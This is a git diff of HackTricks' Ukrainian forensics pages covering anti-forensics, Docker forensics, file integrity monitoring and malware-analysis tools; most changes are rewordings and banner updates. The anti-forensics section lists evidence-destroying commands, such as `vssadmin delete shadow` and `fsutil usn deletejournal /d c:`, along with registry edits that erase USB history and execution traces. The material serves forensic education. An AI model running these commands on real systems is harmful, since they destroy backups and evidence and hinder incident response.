дані в цьому вільному просторі**. +NFTS використовує кластер та мінімальний розмір інформації. Це означає, що якщо файл займає кластер і половину, **решта половина ніколи не буде використана**, поки файл не буде видалено. Тому можна **приховати дані в цьому вільному просторі**. -Є інструменти, такі як slacker, які дозволяють приховувати дані в цьому "прихованому" просторі. Однак аналіз `$logfile` та `$usnjrnl` може показати, що деякі дані було додано: +Існують інструменти, такі як slacker, які дозволяють приховувати дані в цьому "прихованому" просторі. Однак аналіз `$logfile` та `$usnjrnl` може показати, що деякі дані було додано: ![](<../../.gitbook/assets/image (452).png>) -Тоді можна відновити вільний простір за допомогою інструментів, таких як FTK Imager. Зверніть увагу, що цей тип інструменту може зберігати вміст в обфускованому або навіть зашифрованому вигляді. +Тому можна відновити вільний простір за допомогою інструментів, таких як FTK Imager. Зверніть увагу, що цей тип інструменту може зберігати вміст затемненим або навіть зашифрованим. # UsbKill -Це інструмент, який **вимкне комп'ютер, якщо виявлені будь-які зміни в USB** портах.\ -Щоб виявити це, слід перевірити запущені процеси та **переглянути кожний запущений скрипт Python**. +Це інструмент, який **вимкне комп'ютер**, якщо виявлено будь-які зміни в портах **USB**.\ +Щоб виявити це, слід перевірити запущені процеси та **переглянути кожен запущений сценарій Python**. -# Живі Дистрибутиви Linux +# Живі дистрибутиви Linux -Ці дистрибутиви **виконуються всередині оперативної пам'яті RAM**. Єдиний спосіб виявити їх - **у випадку, якщо файлова система NTFS монтується з правами на запис**. Якщо вона монтується лише з правами на читання, то виявити вторгнення буде неможливо. +Ці дистрибутиви **виконуються в оперативній пам'яті**. Єдиний спосіб виявити їх - **якщо файлова система NTFS монтується з правами на запис**. Якщо вона монтується лише з правами на читання, виявити вторгнення буде неможливо. -# Безпечне Видалення +# Безпечне видалення [https://github.com/Claudio-C/awesome-data-sanitization](https://github.com/Claudio-C/awesome-data-sanitization) -# Конфігурація Windows +# Налаштування Windows -Можливо вимкнути кілька методів журналювання Windows, щоб ускладнити розслідування форензики. +Можливо вимкнути кілька методів журналювання Windows, щоб ускладнити розслідування форензіки. -## Вимкнення Відміток Часу - UserAssist +## Вимкнення відміток часу - UserAssist -Це реєстровий ключ, який зберігає дати та години, коли кожний виконуваний файл був запущений користувачем. +Це реєстровий ключ, який зберігає дати та години, коли кожен виконуваний виконуваний файл користувачем. -Для вимкнення UserAssist потрібно виконати два кроки: +Вимкнення UserAssist потребує двох кроків: 1. Встановіть два реєстрових ключа, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` та `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, обидва на нуль, щоб позначити, що ми хочемо вимкнути UserAssist. -2. Очистіть гілки реєстру, які виглядають як `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\<хеш>`. +2. Очистіть піддерева реєстру, які виглядають як `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\<хеш>`. -## Вимкнення Відміток Часу - Prefetch +## Вимкнення відміток часу - Prefetch -Це збереже інформацію про виконані програми з метою покращення продуктивності системи Windows. Однак це також може бути корисним для практик форензики. +Це збереже інформацію про виконані програми з метою покращення продуктивності системи Windows. Однак це також може бути корисним для практик форензіки. * Виконайте `regedit` * Виберіть шлях файлу `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters` @@ -109,9 +114,9 @@ NTFS використовує кластер та мінімальний роз * Виберіть Змінити для кожного з них, щоб змінити значення з 1 (або 3) на 0 * Перезавантажте -## Вимкнення Відміток Часу - Останній Час Доступу +## Вимкнення відміток часу - Останній час доступу -Кожного разу, коли відкривається папка з тома NTFS на сервері Windows NT, система витрачає час на **оновлення полі відмітки часу на кожній перерахованій папці**, яке називається останній час доступу. На сильно використовуваному томі NTFS це може вплинути на продуктивність. +Кожного разу, коли папка відкривається з тома NTFS на сервері Windows NT, система витрачає час на **оновлення полі відмітки часу на кожній перерахованій папці**, яке називається останнім часом доступу. На сильно використовуваному томі NTFS це може вплинути на продуктивність. 1. Відкрийте Редактор реєстру (Regedit.exe). 2. Перейдіть до `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`. @@ -119,17 +124,17 @@ NTFS використовує кластер та мінімальний роз 4. Закрийте Редактор реєстру та перезавантажте сервер. ## Видалення історії USB -Всі **записи пристроїв USB** зберігаються в реєстрі Windows під ключем реєстру **USBSTOR**, який містить підключі, що створюються кожного разу, коли ви підключаєте пристрій USB до свого ПК або ноутбука. Ви можете знайти цей ключ тут `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Видалення цього** ключа призведе до видалення історії USB.\ +Усі **записи пристроїв USB** зберігаються в реєстрі Windows під ключем реєстру **USBSTOR**, який містить підключені ключі, які створюються кожного разу, коли ви підключаєте пристрій USB до свого ПК або ноутбука. Ви можете знайти цей ключ тут `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Видалення цього** ключа призведе до видалення історії USB.\ Ви також можете скористатися інструментом [**USBDeview**](https://www.nirsoft.net/utils/usb\_devices\_view.html), щоб переконатися, що ви їх видалили (і видалити їх). -Іншим файлом, який зберігає інформацію про USB, є файл `setupapi.dev.log` всередині `C:\Windows\INF`. Його також слід видалити. +Ще один файл, який зберігає інформацію про USB, це файл `setupapi.dev.log` всередині `C:\Windows\INF`. Його також слід видалити. ## Вимкнення тіньових копій -**Вивести** тіньові копії за допомогою `vssadmin list shadowstorage`\ -**Видалити** їх, виконавши `vssadmin delete shadow` +**Вивести список** тіньових копій за допомогою `vssadmin list shadowstorage`\ +**Видалити** їх, запустивши `vssadmin delete shadow` -Ви також можете видалити їх через GUI, слідуючи за кроками, запропонованими за посиланням [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html) +Ви також можете видалити їх через GUI, виконавши кроки, запропоновані за посиланням [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html) Щоб вимкнути тіньові копії [кроки звідси](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows): @@ -137,7 +142,7 @@ NTFS використовує кластер та мінімальний роз 2. Зі списку знайдіть "Тіньову копію тому", виберіть її, а потім отримайте доступ до властивостей, клацнувши правою кнопкою миші. 3. Виберіть "Вимкнено" зі списку випадаючих меню "Тип запуску", а потім підтвердіть зміну, клацнувши "Застосувати" і "OK". -Також можливо змінити конфігурацію файлів, які будуть скопійовані в тіньову копію, у реєстрі `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` +Також можливо змінити конфігурацію файлів, які будуть скопійовані в тіньову копію, в реєстрі `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` ## Перезапис видалених файлів @@ -159,3 +164,7 @@ NTFS використовує кластер та мінімальний роз ## Вимкнення $UsnJrnl * `fsutil usn deletejournal /d c:` + +
+ +{% embed url="https://websec.nl/" %} diff --git a/forensics/basic-forensic-methodology/docker-forensics.md b/forensics/basic-forensic-methodology/docker-forensics.md index 3a1299202..e5b05ae52 100644 --- a/forensics/basic-forensic-methodology/docker-forensics.md +++ b/forensics/basic-forensic-methodology/docker-forensics.md @@ -1,18 +1,19 @@ -# Форензіка Docker +# Docker Forensics + +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} ## Зміна контейнера @@ -22,7 +23,7 @@ docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES cc03e43a052a lamp-wordpress "./run.sh" 2 minutes ago Up 2 minutes 80/tcp wordpress ``` -Ви можете легко **знайти модифікації, внесені до цього контейнера щодо зображення**, за допомогою: +Ви легко можете **знайти модифікації, внесені до цього контейнера щодо зображення**, за допомогою: ```bash docker diff wordpress C /var @@ -36,7 +37,7 @@ A /var/lib/mysql/mysql/time_zone_leap_second.MYI A /var/lib/mysql/mysql/general_log.CSV ... ``` -У попередній команді **C** означає **Змінено**, а **A,** **Додано**. Якщо ви виявите, що якийсь цікавий файл, наприклад, `/etc/shadow`, був змінений, ви можете завантажити його з контейнера, щоб перевірити наявність зловмисної діяльності за допомогою: +У попередній команді **C** означає **Змінено**, а **A,** **Додано**. Якщо ви виявите, що який-небудь цікавий файл, наприклад `/etc/shadow`, був змінений, ви можете завантажити його з контейнера, щоб перевірити наявність зловмисної діяльності за допомогою: ```bash docker cp wordpress:/etc/shadow. ``` @@ -52,20 +53,20 @@ docker exec -it wordpress bash ``` ## Зміни в зображеннях -Коли вам надають експортоване зображення Docker (найімовірніше у форматі `.tar`), ви можете використовувати [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases), щоб **витягти підсумок змін**: +Коли вам надають експортоване зображення Docker (імовірно, у форматі `.tar`), ви можете використовувати [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases), щоб **витягти підсумок змін**: ```bash docker save > image.tar #Export the image to a .tar file container-diff analyze -t sizelayer image.tar container-diff analyze -t history image.tar container-diff analyze -t metadata image.tar ``` -Потім ви можете **розпакувати** зображення та **отримати доступ до блобів**, щоб шукати підозрілі файли, які ви могли знайти в історії змін: +Після цього ви можете **розпакувати** зображення та **отримати доступ до блобів**, щоб шукати підозрілі файли, які ви могли знайти в історії змін: ```bash tar -xf image.tar ``` ### Базовий аналіз -Ви можете отримати **базову інформацію** з образу, який запущено: +Ви можете отримати **базову інформацію** з образу, який працює: ```bash docker inspect ``` @@ -80,7 +81,7 @@ dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers> ``` ### Занурення -Для пошуку доданих/змінених файлів в образах Docker ви також можете використовувати утиліту [**dive**](https://github.com/wagoodman/dive) (завантажте її з [**релізів**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)): +Для пошуку доданих/змінених файлів в образах Docker ви також можете використовувати [**dive**](https://github.com/wagoodman/dive) (завантажте його з [**релізів**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) утиліту: ```bash #First you need to load the image in your docker repo sudo docker load < image.tar 1 ⨯ @@ -89,9 +90,9 @@ Loaded image: flask:latest #And then open it with dive: sudo dive flask:latest ``` -Це дозволяє вам **переміщатися між різними блоками образів Docker** та перевіряти, які файли були змінені/додані. **Червоний** означає додано, а **жовтий** - змінено. Використовуйте **Tab**, щоб перейти до іншого виду, та **пробіл**, щоб згорнути/розгорнути папки. +Це дозволяє вам **переміщатися між різними блоками зображень Docker** та перевіряти, які файли були змінені/додані. **Червоний** означає додано, а **жовтий** означає змінено. Використовуйте **Tab**, щоб перейти до іншого виду, та **пробіл**, щоб згорнути/відкрити папки. -За допомогою цієї команди ви не зможете отримати доступ до вмісту різних етапів зображення. Для цього вам потрібно **розпакувати кожен шар та отримати до нього доступ**.\ +За допомогою die ви не зможете отримати доступ до вмісту різних етапів зображення. Для цього вам потрібно **розпакувати кожен шар та отримати до нього доступ**.\ Ви можете розпакувати всі шари зображення з каталогу, де було розпаковано зображення, виконавши: ```bash tar -xf image.tar @@ -99,6 +100,6 @@ for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; don ``` ## Облікові дані з пам'яті -Зверніть увагу, що коли ви запускаєте контейнер Docker всередині хоста **ви можете бачити процеси, що працюють у контейнері з хоста**, просто запустивши `ps -ef` +Зверніть увагу, що коли ви запускаєте контейнер Docker всередині хоста **ви можете бачити процеси, що працюють в контейнері з хоста**, просто запустивши `ps -ef` -Отже (як root) ви можете **витягти пам'ять процесів** з хоста та шукати **облікові дані** просто [**як у наступному прикладі**](../../linux-hardening/privilege-escalation/#process-memory). +Отже (як root) ви можете **вивантажити пам'ять процесів** з хоста та шукати **облікові дані** просто [**як у наступному прикладі**](../../linux-hardening/privilege-escalation/#process-memory). diff --git a/forensics/basic-forensic-methodology/file-integrity-monitoring.md b/forensics/basic-forensic-methodology/file-integrity-monitoring.md index 0e50a9940..642686109 100644 --- a/forensics/basic-forensic-methodology/file-integrity-monitoring.md +++ b/forensics/basic-forensic-methodology/file-integrity-monitoring.md @@ -1,28 +1,29 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Школа взлому AWS для Червоної Команди (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Школа взлому GCP для Червоної Команди (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} # Базовий рівень -Базовий рівень полягає в створенні знімка певних частин системи для **порівняння з майбутнім станом для виявлення змін**. +Базовий рівень полягає в створенні знімка певних частин системи для **порівняння з майбутнім станом для виділення змін**. -Наприклад, ви можете обчислити та зберегти хеш кожного файлу файлової системи, щоб виявити, які файли були змінені.\ +Наприклад, можна обчислити та зберегти хеш кожного файлу файлової системи, щоб визначити, які файли були змінені.\ Це також можна зробити з створеними обліковими записами користувачів, запущеними процесами, запущеними службами та будь-чим іншим, що не повинно змінюватися або змінюватися мало. ## Моніторинг Цілісності Файлів -Моніторинг цілісності файлів (FIM) є критичною технікою безпеки, яка захищає ІТ-середовища та дані, відстежуючи зміни в файлах. Він включає два ключові кроки: +Моніторинг цілісності файлів (FIM) - це критична техніка безпеки, яка захищає ІТ-середовища та дані, відстежуючи зміни в файлах. Вона включає два ключові кроки: 1. **Порівняння з базовим рівнем:** Встановлення базового рівня за допомогою атрибутів файлів або криптографічних контрольних сум (наприклад, MD5 або SHA-2) для майбутніх порівнянь для виявлення модифікацій. 2. **Сповіщення про зміни в реальному часі:** Отримуйте миттєві сповіщення, коли файли доступні або змінені, зазвичай за допомогою розширень ядра ОС. @@ -37,16 +38,17 @@ * [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it) +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Школа взлому AWS для Червоної Команди (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Школа взлому GCP для Червоної Команди (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/malware-analysis.md b/forensics/basic-forensic-methodology/malware-analysis.md index f18f990c8..c112d5304 100644 --- a/forensics/basic-forensic-methodology/malware-analysis.md +++ b/forensics/basic-forensic-methodology/malware-analysis.md @@ -1,20 +1,21 @@ # Аналіз шкідливих програм +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} -## Шпаргалки з форензики +## Шпаргалки Forensics [https://www.jaiminton.com/cheatsheet/DFIR/#](https://www.jaiminton.com/cheatsheet/DFIR/) @@ -36,7 +37,7 @@ sudo apt-get install -y yara ``` #### Підготовка правил -Використовуйте цей скрипт для завантаження та об'єднання всіх правил yara для виявлення шкідливих програм з github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ +Використовуйте цей скрипт для завантаження та об'єднання всіх правил виявлення шкідливих програм yara з github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ Створіть каталог _**rules**_ та виконайте його. Це створить файл з назвою _**malware\_rules.yar**_, який містить всі правила yara для виявлення шкідливих програм. ```bash wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py @@ -69,7 +70,7 @@ clamscan folderpath #Scan the whole folder ``` ### [Capa](https://github.com/mandiant/capa) -**Capa** виявляє потенційно шкідливі **можливості** в виконуваних файлах: PE, ELF, .NET. Таким чином, він знайде такі речі, як тактики Att\&ck або підозрілі можливості, такі як: +**Capa** виявляє потенційно шкідливі **можливості** в виконуваних файлах: PE, ELF, .NET. Таким чином, він знайде такі речі, як тактика Att\&ck або підозрілі можливості, такі як: * перевірка помилки OutputDebugString * запуск як служба @@ -80,7 +81,7 @@ clamscan folderpath #Scan the whole folder ### IOCs IOC означає Індикатор Компрометації. IOC - це набір **умов, які ідентифікують** деяке потенційно небажане програмне забезпечення або підтверджене **шкідливе програмне забезпечення**. Команди Blue використовують цей тип визначення для **пошуку цього типу шкідливих файлів** у своїх **системах** та **мережах**.\ -Дуже корисно ділитися цими визначеннями, оскільки коли шкідливе програмне забезпечення ідентифікується на комп'ютері і створюється IOC для цього шкідливого програмного забезпечення, інші команди Blue можуть використовувати його для швидшої ідентифікації шкідливого програмного забезпечення. +Дуже корисно ділитися цими визначеннями, оскільки коли шкідливе програмне забезпечення ідентифікується на комп'ютері і створюється IOC для цього шкідливого програмного забезпечення, інші команди Blue можуть використовувати його для ідентифікації шкідливого програмного забезпечення швидше. Інструмент для створення або зміни IOCs - [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\ Ви можете використовувати інструменти, такі як [**Redline**](https://www.fireeye.com/services/freeware/redline.html) для **пошуку визначених IOCs на пристрої**. @@ -102,9 +103,9 @@ Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files 4. C2 Back Connect Check Compares process connection endpoints with C2 IOCs (new since version v.10) ``` -### Linux Malware Detect +### Виявлення шкідливих програм для Linux -[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) - це програма для виявлення шкідливих програм для Linux, що випущена під ліцензією GNU GPLv2, яка розроблена для боротьби з загрозами, з якими стикаються в спільних хостингових середовищах. Вона використовує дані про загрози з систем виявлення вторгнень на мережевому краю для вилучення шкідливих програм, які активно використовуються в атаках, та генерує підписи для виявлення. Крім того, дані про загрози також походять від користувачів за допомогою функції перевірки LMD та ресурсів спільноти щодо шкідливих програм. +[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) - це програма для виявлення шкідливих програм для Linux, яка випущена під ліцензією GNU GPLv2 і призначена для боротьби з загрозами, з якими стикаються в спільних хостингових середовищах. Вона використовує дані про загрози з систем виявлення вторгнень на мережевому краю для вилучення шкідливих програм, які активно використовуються в атаках, та генерує підписи для виявлення. Крім того, дані про загрози також походять від користувацьких внесків за допомогою функції перевірки LMD та ресурсів спільноти щодо шкідливих програм. ### rkhunter @@ -114,7 +115,7 @@ sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--sk ``` ### FLOSS -[**FLOSS**](https://github.com/mandiant/flare-floss) - це інструмент, який спробує знайти зашифровані рядки всередині виконуваних файлів за допомогою різних технік. +[**FLOSS**](https://github.com/mandiant/flare-floss) - це інструмент, який спробує знайти зашифровані рядки всередині виконуваних файлів, використовуючи різні техніки. ### PEpper @@ -122,7 +123,7 @@ sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--sk ### PEstudio -[PEstudio](https://www.winitor.com/download) - це інструмент, який дозволяє отримувати інформацію про виконувані файли Windows, такі як імпорт, експорт, заголовки, а також перевіряє VirusTotal та знаходить потенційні техніки Att\&ck. +[PEstudio](https://www.winitor.com/download) - це інструмент, який дозволяє отримувати інформацію про виконувані файли Windows, таку як імпорт, експорт, заголовки, а також перевіряє VirusTotal та знаходить потенційні техніки Att\&ck. ### Detect It Easy(DiE) @@ -153,12 +154,27 @@ spctl --assess --verbose /Applications/Safari.app ### Стекінг файлів -Якщо ви знаєте, що деяка папка, що містить **файли** веб-сервера, **була останнім разом оновлена на певну дату**. **Перевірте** дату створення та зміни всіх **файлів** на **веб-сервері**, і якщо яка-небудь дата є **підозрілою**, перевірте цей файл. +Якщо ви знаєте, що деяка тека, що містить **файли** веб-сервера, була **останнім разом оновлена на певну дату**. **Перевірте** дату всіх **файлів** у **веб-сервері були створені та змінені**, і якщо яка-небудь дата є **підозрілою**, перевірте цей файл. -### Базові значення +### Базові лінії -Якщо файли папки **не повинні були бути змінені**, ви можете обчислити **хеш** **оригінальних файлів** папки та **порівняти** їх з **поточними**. Будь-що змінене буде **підозрілим**. +Якщо файли теки **не повинні були бути змінені**, ви можете обчислити **хеш** **оригінальних файлів** теки та **порівняти** їх з **поточними**. Будь-що, що було змінено, буде **підозрілим**. ### Статистичний аналіз -Коли інформація зберігається в журналах, ви можете **перевірити статистику, таку як кількість разів, коли кожен файл веб-сервера був доступний, оскільки веб-оболонка може бути одним з найбільш**. +Коли інформація зберігається в журналах, ви можете **перевірити статистику, таку як скільки разів кожен файл веб-сервера був доступний, оскільки веб-оболонка може бути одним з найбільш**. + +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Підтримайте HackTricks + +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub. + +
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md index b4570bbf2..48e49eba1 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md @@ -1,23 +1,24 @@ +{% hint style="success" %} +Вивчайте та вправляйтесь в хакінгу AWS: [**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та вправляйтесь в хакінгу GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte) +
